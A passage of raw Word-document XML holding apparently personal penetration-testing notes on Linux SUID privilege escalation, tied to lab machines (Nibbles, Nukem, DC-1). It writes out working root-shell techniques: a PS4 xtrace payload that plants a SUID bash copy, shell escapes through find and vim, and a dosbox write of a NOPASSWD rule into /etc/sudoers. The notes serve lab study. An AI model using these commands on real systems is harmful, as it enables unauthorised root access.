          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This reveals that the system function is being used to execute the service program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000218A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the SUID file with bash debugging enabled and the PS4 variable assigned to our payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000218B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chown root /tmp/rootbash; chmod +s /tmp/rootbash)' /usr/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the /tmp/rootbash file with the -p command line option to get a root shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000218D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ /tmp/rootbash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000218E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rootbash-4.1# id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000218F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=1000(user) gid=1000(user) euid=0(root) egid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(pl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002191">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ugdev),1000(user)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002192">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021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94">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_75idqaetrvi4" w:id="291"/>
      <w:bookmarkEnd w:id="291"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID attacks from GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002195">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002196">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wzv2kj648o05" w:id="292"/>
      <w:bookmarkEnd w:id="292"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/find</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002197">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002198">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId704">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nibbles</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002199">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000219A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId705">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Quackerjack</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19B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000219C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can either abuse it using the way as specified in GTFOBins, but if that doesn't work, you can also use this alternative command used in this write up for </w:t>
      </w:r>
      <w:hyperlink r:id="rId706">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> But in this case, both the GTFOBins and this command work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000219D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find /root/thefinalflag.txt -exec /bin/sh \;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000219E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="386"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You don't have to replace "/root/thefinalflag.txt." It doesn't exist even in the actual box</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000219F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kmcl6nekgv6v" w:id="293"/>
      <w:bookmarkEnd w:id="293"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/vim </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On GTFOBins, the exploit for VIM using SUID was:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1227"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But our machine didn't have</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so it might look like the command doesn't work. But, all we had to do was switch </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021A9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_triv14e6b1ij" w:id="294"/>
      <w:bookmarkEnd w:id="294"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/dosbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId707">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nukem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, they found /usr/bin/dosoox with SUID bit set and they saw it in GTFOBins. It allows them to write to files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1440"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They then tried to write to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1440"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root’s authorized_keys file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1440"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1440"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But both failed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1440"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So then they wrote to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1440"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFILE='/etc/sudoers'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1440"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/dosbox -c 'mount c /' -c "echo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">commander </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ALL=(ALL) NOPASSWD: ALL &gt;&gt; c:$LFILE" -c exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1440"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">commander</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" is the name of the current user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1440"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then they did </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo su </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and got root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:hyperlink r:id="rId708">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nukem</w:t>
        </w:r>
